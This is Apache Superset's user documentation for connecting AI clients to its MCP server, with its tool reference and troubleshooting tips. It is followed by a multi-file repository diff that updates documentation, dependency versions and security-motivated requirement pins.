## What Can AI Do with Superset?

### Explore Your Data

Ask your AI assistant to browse what's available in your Superset instance:

- **List datasets** -- see all datasets you have access to, with filtering and search
- **Get dataset details** -- column names, types, available metrics, and filters
- **List charts and dashboards** -- find existing visualizations by name or keyword
- **Get chart and dashboard details** -- understand what a chart shows, its query, and configuration

**Example prompts:**
> "What datasets are available?"
> "Show me the columns in the sales_orders dataset"
> "Find dashboards related to revenue"

### Build Charts

Describe the visualization you want and AI creates it for you:

- **Create charts from natural language** -- describe what you want to see and AI picks the right chart type, metrics, and dimensions
- **Preview before saving** -- `generate_chart` defaults to `save_chart=False`, showing the chart in Explore before it's committed. Ask AI to save once you're satisfied.
- **Modify existing charts** -- `update_chart` also supports preview mode so you can review changes before saving
- **Get Explore links** -- open any chart in Superset's Explore view for further refinement

**Example prompts:**
> "Create a bar chart showing monthly revenue by region from the sales dataset"
> "Update chart 42 to use a line chart instead"
> "Give me a link to explore this chart further"

### Create Dashboards

Build dashboards from a collection of charts:

- **Generate dashboards** -- create a new dashboard with a set of charts, automatically laid out
- **Add charts to existing dashboards** -- place a chart on an existing dashboard with automatic positioning

**Example prompts:**
> "Create a dashboard called 'Q4 Sales Overview' with charts 10, 15, and 22"
> "Add the revenue trend chart to the executive dashboard"

### Run SQL Queries

Execute SQL directly through your AI assistant:

- **Run queries** -- execute SQL with full Superset RBAC enforcement (you can only query data your roles allow)
- **Open SQL Lab** -- get a link to SQL Lab pre-populated with a query, ready to run and explore

**Example prompts:**
> "Run this query: SELECT region, SUM(revenue) FROM sales GROUP BY region"
> "Open SQL Lab with a query to show the top 10 customers by order count"

### Analyze Chart Data

Pull the raw data behind any chart:

- **Get chart data** -- retrieve the data a chart displays, with support for JSON, CSV, and Excel export formats
- **Inspect results** -- useful for verifying what a visualization shows or feeding data into other tools

**Example prompts:**
> "Get the data behind chart 42"
> "Export chart 15 data as CSV"

### Check Instance Status

- **Health check** -- verify your Superset instance is up and the MCP connection is working
- **Instance info** -- get high-level statistics about your Superset instance (number of datasets, charts, dashboards)

**Example prompts:**
> "Is Superset healthy?"
> "How many dashboards are in this instance?"

---

## Connecting Your AI Client

Once your admin has deployed the MCP server, connect your AI client using the instructions below.

### Claude Desktop

Edit your Claude Desktop config file:

- **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
- **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
- **Linux**: `~/.config/Claude/claude_desktop_config.json`

```json
{
  "mcpServers": {
    "superset": {
      "url": "http://localhost:5008/mcp"
    }
  }
}
```

Restart Claude Desktop. The hammer icon in the chat bar confirms the connection.

If your admin has enabled JWT authentication, you may need to include a token:

```json
{
  "mcpServers": {
    "superset": {
      "command": "npx",
      "args": [
        "-y",
        "mcp-remote@latest",
        "http://your-superset-host:5008/mcp",
        "--header",
        "Authorization: Bearer YOUR_TOKEN"
      ]
    }
  }
}
```

### Claude Code (CLI)

Add to your project's `.mcp.json`:

```json
{
  "mcpServers": {
    "superset": {
      "type": "url",
      "url": "http://localhost:5008/mcp"
    }
  }
}
```

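If you prefer the CLI to editing the file by hand, recent Claude Code releases can register the server directly (a sketch; confirm the subcommand and flags against your installed version):

```bash
# Sketch: register the Superset MCP server for the current project over HTTP
claude mcp add --transport http superset http://localhost:5008/mcp
```
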
### ChatGPT

1. Click your profile icon > **Settings** > **Apps and Connectors**
2. Enable **Developer Mode** in Advanced Settings
3. In the chat composer, press **+** > **Add sources** > **App** > **Connect more** > **Create app**
4. Enter a name and your MCP server URL
5. Click **I understand and continue**

:::info
ChatGPT MCP connectors require a Pro, Team, Enterprise, or Edu plan.
:::

Ask your admin for the MCP server URL and any authentication tokens you need.

---

## Tips for Best Results

- **Be specific** -- "Create a bar chart of monthly revenue by region from the sales dataset" works better than "Make me a chart"
- **Start with exploration** -- ask what datasets and charts exist before creating new ones
- **Review AI-generated content** -- always check chart configurations and SQL before saving or sharing
- **Use Explore for refinement** -- ask AI for an Explore link, then fine-tune interactively in the Superset UI
- **Check permissions if you get errors** -- AI respects Superset's RBAC, so you can only access data your roles allow

---

## Available Tools Reference

### Exploration & Discovery

| Tool | Description |
|------|-------------|
| `health_check` | Verify the MCP server is running and connected |
| `get_instance_info` | Get instance statistics (dataset, chart, dashboard counts) |
| `get_schema` | Discover available charts, datasets, and dashboards with schema info |

### Datasets

| Tool | Description |
|------|-------------|
| `list_datasets` | List datasets with filtering and search |
| `get_dataset_info` | Get dataset metadata (columns, metrics, filters) |
| `create_virtual_dataset` | Create a virtual dataset from a SQL query |

### Charts

| Tool | Description |
|------|-------------|
| `list_charts` | List charts with filtering and search |
| `get_chart_info` | Get chart metadata and configuration |
| `get_chart_data` | Retrieve chart data (JSON, CSV, or Excel) |
| `get_chart_preview` | Generate a chart preview (URL, ASCII, table, or Vega-Lite) |
| `get_chart_type_schema` | Get the configuration schema for a chart type |
| `generate_chart` | Create a new chart from a specification (defaults to preview mode — review before saving) |
| `update_chart` | Modify an existing chart's configuration (pass `generate_preview=False` to persist immediately instead of returning a preview URL) |
| `update_chart_preview` | Update a cached chart preview without saving |
| `generate_explore_link` | Generate an Explore URL for interactive visualization |

### Dashboards

| Tool | Description |
|------|-------------|
| `list_dashboards` | List dashboards with filtering and search |
| `get_dashboard_info` | Get dashboard metadata and layout |
| `generate_dashboard` | Create a new dashboard with specified charts |
| `add_chart_to_existing_dashboard` | Add a chart to an existing dashboard |

### SQL

| Tool | Description |
|------|-------------|
| `execute_sql` | Run a SQL query with RBAC enforcement |
| `save_sql_query` | Persist a SQL query to SQL Lab's saved queries |
| `open_sql_lab_with_context` | Open SQL Lab with a pre-populated query |

### Databases

| Tool | Description |
|------|-------------|
| `list_databases` | List configured database connections |
| `get_database_info` | Get details about a specific database connection |

---

## Troubleshooting

### "Connection refused" or "Cannot connect"

- Confirm the MCP server URL with your admin
- For Claude Desktop: fully quit the app (not just close the window) and restart after config changes
- Check that the URL path ends with `/mcp` (e.g., `http://localhost:5008/mcp`)

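A quick way to separate a network problem from a client-configuration problem is to probe the URL directly (a sketch; any HTTP response at all, even an error status, means the server is reachable):

```bash
# "Connection refused" here points at the server or network, not the AI client config
curl -i http://localhost:5008/mcp
```
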
### "Permission denied" or missing data
|
||||
|
||||
- Superset's RBAC controls what you can access through AI, just like in the Superset UI
|
||||
- Ask your admin to verify your roles and permissions
|
||||
- Try accessing the same data through the Superset web UI to confirm your access
|
||||
|
||||
### "Response too large"
|
||||
|
||||
- Ask for smaller result sets: use filters, reduce `page_size`, or request specific columns
|
||||
- Example: "Show me the top 10 rows from the sales dataset" instead of "Show me all sales data"
|
||||
|
||||
### AI doesn't see Superset tools
|
||||
|
||||
- Verify the connection in your AI client (e.g., the hammer icon in Claude Desktop)
|
||||
- Ask the AI "What Superset tools are available?" to confirm the connection
|
||||
- Restart your AI client if you recently changed the configuration
|
||||
@@ -40,13 +40,13 @@
    "version:remove:components": "node scripts/manage-versions.mjs remove components"
  },
  "dependencies": {
-    "@ant-design/icons": "^6.1.0",
-    "@docusaurus/core": "3.9.2",
-    "@docusaurus/faster": "^3.9.2",
-    "@docusaurus/plugin-client-redirects": "3.9.2",
-    "@docusaurus/preset-classic": "3.9.2",
-    "@docusaurus/theme-live-codeblock": "^3.9.2",
-    "@docusaurus/theme-mermaid": "^3.9.2",
+    "@ant-design/icons": "^6.1.1",
+    "@docusaurus/core": "^3.10.0",
+    "@docusaurus/faster": "^3.10.0",
+    "@docusaurus/plugin-client-redirects": "^3.10.0",
+    "@docusaurus/preset-classic": "3.10.0",
+    "@docusaurus/theme-live-codeblock": "^3.10.0",
+    "@docusaurus/theme-mermaid": "^3.10.0",
    "@emotion/core": "^11.0.0",
    "@emotion/react": "^11.13.3",
    "@emotion/styled": "^11.14.1",
@@ -67,12 +67,12 @@
    "@storybook/preview-api": "^8.6.18",
    "@storybook/theming": "^8.6.15",
    "@superset-ui/core": "^0.20.4",
-    "@swc/core": "^1.15.17",
-    "antd": "^6.3.2",
-    "baseline-browser-mapping": "^2.10.0",
-    "caniuse-lite": "^1.0.30001775",
-    "docusaurus-plugin-openapi-docs": "^4.6.0",
-    "docusaurus-theme-openapi-docs": "^4.6.0",
+    "@swc/core": "^1.15.30",
+    "antd": "^6.3.6",
+    "baseline-browser-mapping": "^2.10.21",
+    "caniuse-lite": "^1.0.30001790",
+    "docusaurus-plugin-openapi-docs": "^5.0.1",
+    "docusaurus-theme-openapi-docs": "^5.0.1",
    "js-yaml": "^4.1.1",
    "js-yaml-loader": "^1.2.2",
    "json-bigint": "^1.0.0",
@@ -86,28 +86,28 @@
    "remark-import-partial": "^0.0.2",
    "reselect": "^5.1.1",
    "storybook": "^8.6.18",
-    "swagger-ui-react": "^5.32.0",
+    "swagger-ui-react": "^5.32.4",
    "swc-loader": "^0.2.7",
    "tinycolor2": "^1.4.2",
    "unist-util-visit": "^5.1.0"
  },
  "devDependencies": {
-    "@docusaurus/module-type-aliases": "^3.9.1",
-    "@docusaurus/tsconfig": "^3.9.2",
+    "@docusaurus/module-type-aliases": "^3.10.0",
+    "@docusaurus/tsconfig": "^3.10.0",
    "@eslint/js": "^9.39.2",
    "@types/js-yaml": "^4.0.9",
    "@types/react": "^19.1.8",
    "@typescript-eslint/eslint-plugin": "^8.52.0",
-    "@typescript-eslint/parser": "^8.56.1",
+    "@typescript-eslint/parser": "^8.59.0",
    "eslint": "^9.39.2",
    "eslint-config-prettier": "^10.1.8",
    "eslint-plugin-prettier": "^5.5.5",
    "eslint-plugin-react": "^7.37.5",
-    "globals": "^17.4.0",
-    "prettier": "^3.8.1",
-    "typescript": "~5.9.3",
-    "typescript-eslint": "^8.56.1",
-    "webpack": "^5.105.4"
+    "globals": "^17.5.0",
+    "prettier": "^3.8.3",
+    "typescript": "~6.0.3",
+    "typescript-eslint": "^8.59.0",
+    "webpack": "^5.106.2"
  },
  "browserslist": {
    "production": [
@@ -124,7 +124,8 @@
  "resolutions": {
    "react-redux": "^9.2.0",
    "@reduxjs/toolkit": "^2.5.0",
-    "baseline-browser-mapping": "^2.9.19"
+    "baseline-browser-mapping": "^2.9.19",
+    "webpackbar": "^7.0.0"
  },
  "packageManager": "yarn@1.22.22+sha1.ac34549e6aa8e7ead463a7407e1c7390f61a6610"
}

@@ -129,6 +129,30 @@ def add_missing_schemas(spec: dict[str, Any]) -> tuple[dict[str, Any], list[str]
        }
        fixed.append("DashboardColorsConfigUpdateSchema")

    # DashboardChartCustomizationsConfigUpdateSchema (dashboards/schemas.py)
    if "DashboardChartCustomizationsConfigUpdateSchema" not in schemas:
        schemas["DashboardChartCustomizationsConfigUpdateSchema"] = {
            "type": "object",
            "properties": {
                "deleted": {
                    "type": "array",
                    "items": {"type": "string"},
                    "description": "List of deleted chart customization IDs.",
                },
                "modified": {
                    "type": "array",
                    "items": {"type": "object"},
                    "description": "List of modified chart customizations.",
                },
                "reordered": {
                    "type": "array",
                    "items": {"type": "string"},
                    "description": "List of chart customization IDs in new order.",
                },
            },
        }
        fixed.append("DashboardChartCustomizationsConfigUpdateSchema")

    # FormatQueryPayloadSchema - based on superset/sqllab/schemas.py
    if "FormatQueryPayloadSchema" not in schemas:
        schemas["FormatQueryPayloadSchema"] = {
@@ -295,6 +319,7 @@ TAG_DESCRIPTIONS = {
    "Security Roles": "Manage security roles and their permissions.",
    "Security Users": "Manage user accounts.",
    "Tags": "Organize assets with tags.",
+    "Themes": "Manage UI themes for customizing Superset's appearance.",
    "User": "User profile and preferences.",
}

@@ -202,7 +202,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \\
  mdx += `| Method | Description | Endpoint |\n`;
  mdx += `|--------|-------------|----------|\n`;
  for (const ep of tagEndpoints['Security']) {
-    mdx += `| \`${ep.method}\` | [${ep.summary}](./api/${ep.slug}) | \`${ep.path}\` |\n`;
+    mdx += `| \`${ep.method}\` | [${ep.summary}](/developer-docs/api/${ep.slug}) | \`${ep.path}\` |\n`;
  }
  mdx += '\n';
  renderedTags.add('Security');
@@ -229,7 +229,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \\
  mdx += `|--------|-------------|----------|\n`;

  for (const ep of endpoints) {
-    mdx += `| \`${ep.method}\` | [${ep.summary}](./api/${ep.slug}) | \`${ep.path}\` |\n`;
+    mdx += `| \`${ep.method}\` | [${ep.summary}](/developer-docs/api/${ep.slug}) | \`${ep.path}\` |\n`;
  }

  mdx += `\n</details>\n\n`;
@@ -252,7 +252,7 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \\
  mdx += `|--------|-------------|----------|\n`;

  for (const ep of endpoints) {
-    mdx += `| \`${ep.method}\` | [${ep.summary}](./api/${ep.slug}) | \`${ep.path}\` |\n`;
+    mdx += `| \`${ep.method}\` | [${ep.summary}](/developer-docs/api/${ep.slug}) | \`${ep.path}\` |\n`;
  }

  mdx += `\n</details>\n\n`;

docs/static/feature-flags.json (vendored, 6 lines changed)
@@ -51,6 +51,12 @@
    "lifecycle": "development",
    "description": "Enable Superset extensions for custom functionality without modifying core"
  },
+  {
+    "name": "FAB_API_KEY_ENABLED",
+    "default": false,
+    "lifecycle": "development",
+    "description": "Enable API key authentication via FAB SecurityManager. When enabled, users can create/manage API keys in the User Info page"
+  },
  {
    "name": "GRANULAR_EXPORT_CONTROLS",
    "default": false,
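As a hedged sketch of how a deployment would act on the new flag (the import is Superset's standard feature-flag accessor; the wrapper function is invented for illustration):

```python
from superset import is_feature_enabled

def api_keys_available() -> bool:
    # FAB_API_KEY_ENABLED defaults to False; deployments opt in with
    # FEATURE_FLAGS = {"FAB_API_KEY_ENABLED": True} in superset_config.py.
    return is_feature_enabled("FAB_API_KEY_ENABLED")
```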
docs/static/img/logos/hifadih.png (vendored, new binary file, 18 KiB; binary file not shown)
docs/static/resources/openapi.json (vendored, 5791 lines changed; diff suppressed because it is too large)
@@ -3,6 +3,7 @@
  "extends": "@docusaurus/tsconfig",
  "compilerOptions": {
    "baseUrl": ".",
+    "ignoreDeprecations": "6.0",
    "skipLibCheck": true,
    "noImplicitAny": false,
    "strict": false,
@@ -109,6 +109,14 @@ SECRET_KEY = 'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY'

You can generate a strong secure key with `openssl rand -base64 42`.

+Alternatively, you can set the secret key using the `SUPERSET_SECRET_KEY` environment variable.
+
+On a Unix-based system, such as Linux or macOS, you can do so by running the following command in your terminal:
+
+```bash
+export SUPERSET_SECRET_KEY=$(openssl rand -base64 42)
+```
+
:::caution Use a strong secret key
This key will be used for securely signing session cookies and encrypting sensitive information stored in Superset's application metadata database.
Your deployment must use a complex, unique key.
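A minimal hedged `superset_config.py` sketch tying the two approaches together (the lookup is illustrative, not Superset's exact config-loading behavior):

```python
import os

# Prefer the environment variable set above; fail loudly rather than
# shipping with a default key.
SECRET_KEY = os.environ["SUPERSET_SECRET_KEY"]
```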
@@ -35,7 +35,7 @@ or a view.
When working with tables, the solution would be to create a table that contains all the fields
needed for your analysis, most likely through some scheduled batch process.

-A view is a simple logical layer that abstracts an arbitrary SQL queries as a virtual table. This can
+A view is a simple logical layer that abstracts an arbitrary SQL query as a virtual table. This can
allow you to join and union multiple tables and to apply some transformation using arbitrary SQL
expressions. The limitation there is your database performance, as Superset effectively will run a
query on top of your query (view). A good practice may be to limit yourself to joining your main
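To make the view pattern concrete, a hedged sketch (table, column, and connection names are invented) of registering such a view with SQLAlchemy; Superset then queries `enriched_orders` as if it were a table:

```python
from sqlalchemy import create_engine, text

# Hypothetical: expose a join of two tables as a virtual table (view).
# Superset will run its own generated query on top of this one.
engine = create_engine("postgresql://user:secret@localhost/analytics")
with engine.begin() as conn:
    conn.execute(text("""
        CREATE VIEW enriched_orders AS
        SELECT o.id, o.amount, c.region
        FROM orders AS o
        JOIN customers AS c ON c.id = o.customer_id
    """))
```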
docs/yarn.lock (2373 lines changed; diff suppressed because it is too large)
@@ -48,7 +48,7 @@ dependencies = [
    "cryptography>=42.0.4, <47.0.0",
    "deprecation>=2.1.0, <2.2.0",
    "flask>=2.2.5, <4.0.0",
-    "flask-appbuilder>=5.0.2,<6",
+    "flask-appbuilder>=5.2.1, <6.0.0",
    "flask-caching>=2.1.0, <3",
    "flask-compress>=1.13, <2.0",
    "flask-talisman>=1.0.0, <2.0",
@@ -89,10 +89,11 @@ dependencies = [
    "python-dateutil",
    "python-dotenv", # optional dependencies for Flask but required for Superset, see https://flask.palletsprojects.com/en/stable/installation/#optional-dependencies
    "pygeohash",
-    "pyarrow>=16.1.0, <19", # before upgrading pyarrow, check that all db dependencies support this, see e.g. https://github.com/apache/superset/pull/34693
+    "pyarrow>=16.1.0, <21", # before upgrading pyarrow, check that all db dependencies support this, see e.g. https://github.com/apache/superset/pull/34693
    "pyyaml>=6.0.0, <7.0.0",
    "PyJWT>=2.4.0, <3.0",
    "redis>=5.0.0, <6.0",
+    "rison>=2.0.0, <3.0",
    "selenium>=4.14.0, <5.0",
    "shillelagh[gsheetsapi]>=1.4.3, <2.0",
    "sshtunnel>=0.4.0, <0.5",
@@ -144,7 +145,7 @@ solr = ["sqlalchemy-solr >= 0.2.0"]
elasticsearch = ["elasticsearch-dbapi>=0.2.12, <0.3.0"]
exasol = ["sqlalchemy-exasol >= 2.4.0, <3.0"]
excel = ["xlrd>=1.2.0, <1.3"]
-fastmcp = ["fastmcp==2.14.3"]
+fastmcp = ["fastmcp>=3.1.0,<4.0"]
firebird = ["sqlalchemy-firebird>=0.7.0, <0.8"]
firebolt = ["firebolt-sqlalchemy>=1.0.0, <2"]
gevent = ["gevent>=23.9.1"]
@@ -183,6 +184,7 @@ risingwave = ["sqlalchemy-risingwave"]
shillelagh = ["shillelagh[all]>=1.4.3, <2"]
singlestore = ["sqlalchemy-singlestoredb>=1.1.1, <2"]
snowflake = ["snowflake-sqlalchemy>=1.2.4, <2"]
+sqlite = ["syntaqlite>=0.1.0"]
spark = [
    "pyhive[hive]>=0.6.5;python_version<'3.11'",
    "pyhive[hive_pure_sasl]>=0.7",
@@ -226,6 +228,7 @@ development = [
    "ruff",
    "sqloxide",
    "statsd",
+    "syntaqlite>=0.1.0",
]

[project.urls]
@@ -238,7 +241,7 @@ combine_as_imports = true
include_trailing_comma = true
line_length = 88
known_first_party = "superset, apache-superset-core, apache-superset-extensions-cli"
-known_third_party = "alembic, apispec, backoff, celery, click, colorama, cron_descriptor, croniter, cryptography, dateutil, deprecation, flask, flask_appbuilder, flask_babel, flask_caching, flask_compress, flask_jwt_extended, flask_login, flask_migrate, flask_sqlalchemy, flask_talisman, flask_testing, flask_wtf, freezegun, geohash, geopy, holidays, humanize, isodate, jinja2, jwt, markdown, markupsafe, marshmallow, marshmallow-union, msgpack, nh3, numpy, pandas, parameterized, parsedatetime, pgsanity, polyline, prison, progress, pyarrow, sqlalchemy_bigquery, pyhive, pyparsing, pytest, pytest_mock, pytz, redis, requests, selenium, setuptools, shillelagh, simplejson, slack, sqlalchemy, sqlalchemy_utils, typing_extensions, urllib3, werkzeug, wtforms, wtforms_json, yaml"
+known_third_party = "alembic, apispec, backoff, celery, click, colorama, cron_descriptor, croniter, cryptography, dateutil, deprecation, flask, flask_appbuilder, flask_babel, flask_caching, flask_compress, flask_jwt_extended, flask_login, flask_migrate, flask_sqlalchemy, flask_talisman, flask_testing, flask_wtf, freezegun, geohash, geopy, holidays, humanize, isodate, jinja2, jwt, markdown, markupsafe, marshmallow, marshmallow-union, msgpack, nh3, numpy, pandas, parameterized, parsedatetime, pgsanity, polyline, rison, progress, pyarrow, sqlalchemy_bigquery, pyhive, pyparsing, pytest, pytest_mock, pytz, redis, requests, selenium, setuptools, shillelagh, simplejson, slack, sqlalchemy, sqlalchemy_utils, syntaqlite, typing_extensions, urllib3, werkzeug, wtforms, wtforms_json, yaml"
multi_line_output = 3
order_by_type = false
@@ -372,6 +375,7 @@ unfixable = []
dummy-variable-rgx = "^(_+|(_+[a-zA-Z0-9_]*[a-zA-Z0-9]+?))$"

[tool.ruff.lint.per-file-ignores]
+"superset/mcp_service/app.py" = ["S608", "E501"] # LLM instruction text: SQL examples (S608) and long lines in multiline string (E501)
"scripts/*" = ["TID251"]
"setup.py" = ["TID251"]
"superset/config.py" = ["TID251"]
@@ -25,6 +25,16 @@ filelock>=3.20.3,<4.0.0
# Security: decompression bomb fix (required by aiohttp 3.13.3)
brotli>=1.2.0,<2.0.0
numexpr>=2.9.0
+# Security: CVE-2026-34073 (MEDIUM) - Improper Certificate Validation
+cryptography>=46.0.7,<47.0.0
+# Security: Snyk - XSS vulnerability in Mako templates
+mako>=1.3.11,<2.0.0
+# Security: CVE-2024-52338 (CRITICAL) - Deserialization of untrusted data in IPC/Parquet readers
+pyarrow>=20.0.0,<21.0.0
+# Security: CVE-2026-27459 - pyopenssl certificate validation
+pyopenssl>=26.0.0,<27.0.0
+# Security: CVE-2026-25645 (MEDIUM) - Insecure Temporary File
+requests>=2.33.0,<3.0.0

# 5.0.0 has a sensitive deprecation used in other libs
# -> https://github.com/aio-libs/async-timeout/blob/master/CHANGES.rst#500-2024-10-31
@@ -86,8 +86,9 @@ cron-descriptor==1.4.5
    # via apache-superset (pyproject.toml)
croniter==6.0.0
    # via apache-superset (pyproject.toml)
-cryptography==46.0.5
+cryptography==46.0.7
    # via
+    #   -r requirements/base.in
    #   apache-superset (pyproject.toml)
    #   paramiko
    #   pyopenssl
@@ -120,7 +121,7 @@ flask==2.3.3
    #   flask-session
    #   flask-sqlalchemy
    #   flask-wtf
-flask-appbuilder==5.0.2
+flask-appbuilder==5.2.1
    # via
    #   apache-superset (pyproject.toml)
    #   apache-superset-core
@@ -205,11 +206,12 @@ kombu==5.5.3
    # via celery
limits==5.1.0
    # via flask-limiter
-mako==1.3.10
+mako==1.3.11
    # via
+    #   -r requirements/base.in
    #   apache-superset (pyproject.toml)
    #   alembic
-markdown==3.8
+markdown==3.8.1
    # via apache-superset (pyproject.toml)
markdown-it-py==3.0.0
    # via rich
@@ -247,7 +249,6 @@ numpy==1.26.4
    #   bottleneck
    #   numexpr
    #   pandas
-    #   pyarrow
odfpy==1.4.1
    # via pandas
openapi-schema-validator==0.6.3
@@ -279,7 +280,7 @@ parsedatetime==2.6
    # via apache-superset (pyproject.toml)
pgsanity==0.2.9
    # via apache-superset (pyproject.toml)
-pillow==11.3.0
+pillow==12.2.0
    # via apache-superset (pyproject.toml)
platformdirs==4.3.8
    # via requests-cache
@@ -291,9 +292,11 @@ prison==0.2.1
    # via flask-appbuilder
prompt-toolkit==3.0.51
    # via click-repl
-pyarrow==16.1.0
-    # via apache-superset (pyproject.toml)
-pyasn1==0.6.2
+pyarrow==20.0.0
+    # via
+    #   -r requirements/base.in
+    #   apache-superset (pyproject.toml)
+pyasn1==0.6.3
    # via
    #   pyasn1-modules
    #   rsa
@@ -309,9 +312,9 @@ pydantic-core==2.33.2
    # via pydantic
pygeohash==3.2.2
    # via apache-superset (pyproject.toml)
-pygments==2.19.1
+pygments==2.20.0
    # via rich
-pyjwt==2.10.1
+pyjwt==2.12.0
    # via
    #   apache-superset (pyproject.toml)
    #   flask-appbuilder
@@ -319,8 +322,10 @@ pyjwt==2.10.1
    #   redis
pynacl==1.6.2
    # via paramiko
-pyopenssl==25.3.0
-    # via shillelagh
+pyopenssl==26.0.0
+    # via
+    #   -r requirements/base.in
+    #   shillelagh
pyparsing==3.2.3
    # via apache-superset (pyproject.toml)
pysocks==1.7.1
@@ -353,8 +358,9 @@ referencing==0.36.2
    # via
    #   jsonschema
    #   jsonschema-specifications
-requests==2.32.4
+requests==2.33.0
    # via
+    #   -r requirements/base.in
    #   requests-cache
    #   shillelagh
requests-cache==1.2.1
@@ -363,6 +369,8 @@ rfc3339-validator==0.1.4
    # via openapi-schema-validator
rich==13.9.4
    # via flask-limiter
+rison==2.0.0
+    # via apache-superset (pyproject.toml)
rpds-py==0.25.0
    # via
    #   jsonschema
@@ -10,6 +10,8 @@
    # via
    # -r requirements/development.in
    #   apache-superset
+aiofile==3.9.0
+    # via py-key-value-aio
alembic==1.15.2
    # via
    # -c requirements/base-constraint.txt
@@ -26,8 +28,10 @@ anyio==4.11.0
    # via
    #   httpx
    #   mcp
+    #   py-key-value-aio
+    #   sse-starlette
    #   starlette
    #   watchfiles
apispec==6.6.1
    # via
    # -c requirements/base-constraint.txt
@@ -65,9 +69,7 @@ bcrypt==4.3.0
    # -c requirements/base-constraint.txt
    #   paramiko
beartype==0.22.5
-    # via
-    #   py-key-value-aio
-    #   py-key-value-shared
+    # via py-key-value-aio
billiard==4.2.1
    # via
    # -c requirements/base-constraint.txt
@@ -100,6 +102,8 @@ cachetools==6.2.1
    # -c requirements/base-constraint.txt
    #   google-auth
    #   py-key-value-aio
+caio==0.9.25
+    # via aiofile
cattrs==25.1.1
    # via
    # -c requirements/base-constraint.txt
@@ -138,7 +142,6 @@ click==8.2.1
    #   click-repl
    #   flask
    #   flask-appbuilder
-    #   typer
    #   uvicorn
click-didyoumean==0.3.1
    # via
@@ -156,8 +159,6 @@ click-repl==0.3.0
    # via
    # -c requirements/base-constraint.txt
    #   celery
-cloudpickle==3.1.2
-    # via pydocket
cmdstanpy==1.1.0
    # via prophet
colorama==0.4.6
@@ -177,7 +178,7 @@ croniter==6.0.0
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
-cryptography==46.0.5
+cryptography==46.0.7
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
@@ -206,8 +207,6 @@ deprecation==2.1.0
    #   apache-superset
dill==0.4.0
    # via pylint
-diskcache==5.6.3
-    # via py-key-value-aio
distlib==0.3.8
    # via virtualenv
dnspython==2.7.0
@@ -237,9 +236,7 @@ et-xmlfile==2.0.0
    #   openpyxl
exceptiongroup==1.3.0
    # via fastmcp
-fakeredis==2.32.1
-    # via pydocket
-fastmcp==2.14.3
+fastmcp==3.1.0
    # via apache-superset
filelock==3.20.3
    # via
@@ -262,7 +259,7 @@ flask==2.3.3
    #   flask-sqlalchemy
    #   flask-testing
    #   flask-wtf
-flask-appbuilder==5.0.2
+flask-appbuilder==5.2.1
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
@@ -474,6 +471,8 @@ jsonpath-ng==1.7.0
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
+jsonref==1.1.0
+    # via fastmcp
jsonschema==4.23.0
    # via
    # -c requirements/base-constraint.txt
@@ -504,14 +503,12 @@ limits==5.1.0
    # via
    # -c requirements/base-constraint.txt
    #   flask-limiter
-lupa==2.6
-    # via fakeredis
-mako==1.3.10
+mako==1.3.11
    # via
    # -c requirements/base-constraint.txt
    #   alembic
    #   apache-superset
-markdown==3.8
+markdown==3.8.1
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
@@ -583,7 +580,6 @@ numpy==1.26.4
    #   pandas
    #   pandas-gbq
    #   prophet
-    #   pyarrow
oauthlib==3.2.2
    # via requests-oauthlib
odfpy==1.4.1
@@ -603,7 +599,7 @@ openpyxl==3.1.5
    # -c requirements/base-constraint.txt
    #   pandas
opentelemetry-api==1.39.1
-    # via pydocket
+    # via fastmcp
ordered-set==4.1.0
    # via
    # -c requirements/base-constraint.txt
@@ -622,6 +618,7 @@ packaging==25.0
    #   deprecation
    #   docker
    #   duckdb-engine
+    #   fastmcp
    #   google-cloud-bigquery
    #   gunicorn
    #   limits
@@ -653,13 +650,11 @@ parsedatetime==2.6
    #   apache-superset
pathable==0.4.3
    # via jsonschema-path
-pathvalidate==3.3.1
-    # via py-key-value-aio
pgsanity==0.2.9
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
-pillow==11.3.0
+pillow==12.2.0
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
@@ -691,8 +686,6 @@ prison==0.2.1
    #   flask-appbuilder
progress==1.6
    # via apache-superset
-prometheus-client==0.23.1
-    # via pydocket
prompt-toolkit==3.0.51
    # via
    # -c requirements/base-constraint.txt
@@ -714,19 +707,15 @@ psutil==6.1.0
    # via apache-superset
psycopg2-binary==2.9.9
    # via apache-superset
-py-key-value-aio==0.3.0
-    # via
-    #   fastmcp
-    #   pydocket
-py-key-value-shared==0.3.0
-    # via py-key-value-aio
-pyarrow==16.1.0
+py-key-value-aio==0.4.4
+    # via fastmcp
+pyarrow==20.0.0
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
    #   db-dtypes
    #   pandas-gbq
-pyasn1==0.6.2
+pyasn1==0.6.3
    # via
    # -c requirements/base-constraint.txt
    #   pyasn1-modules
@@ -758,8 +747,6 @@ pydantic-settings==2.10.1
    # via mcp
pydata-google-auth==1.9.0
    # via pandas-gbq
-pydocket==0.17.1
-    # via fastmcp
pydruid==0.6.9
    # via apache-superset
pyfakefs==5.3.5
@@ -768,7 +755,7 @@ pygeohash==3.2.2
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
-pygments==2.19.1
+pygments==2.20.0
    # via
    # -c requirements/base-constraint.txt
    #   rich
@@ -776,7 +763,7 @@ pyhive==0.7.0
    # via apache-superset
pyinstrument==4.4.0
    # via apache-superset
-pyjwt==2.10.1
+pyjwt==2.12.0
    # via
    # -c requirements/base-constraint.txt
    #   apache-superset
@@ -790,7 +777,7 @@ pynacl==1.6.2
    # via
    # -c requirements/base-constraint.txt
    #   paramiko
-pyopenssl==25.3.0
+pyopenssl==26.0.0
    # via
    # -c requirements/base-constraint.txt
    #   shillelagh
@@ -844,8 +831,6 @@ python-dotenv==1.1.0
    #   apache-superset
    #   fastmcp
    #   pydantic-settings
-python-json-logger==4.0.0
-    # via pydocket
python-ldap==3.4.4
    # via apache-superset
python-multipart==0.0.20
@@ -866,22 +851,20 @@ pyyaml==6.0.2
    # -c requirements/base-constraint.txt
    #   apache-superset
    #   apispec
-    #   fastmcp
    #   jsonschema-path
    #   pre-commit
redis==5.3.1
    # via
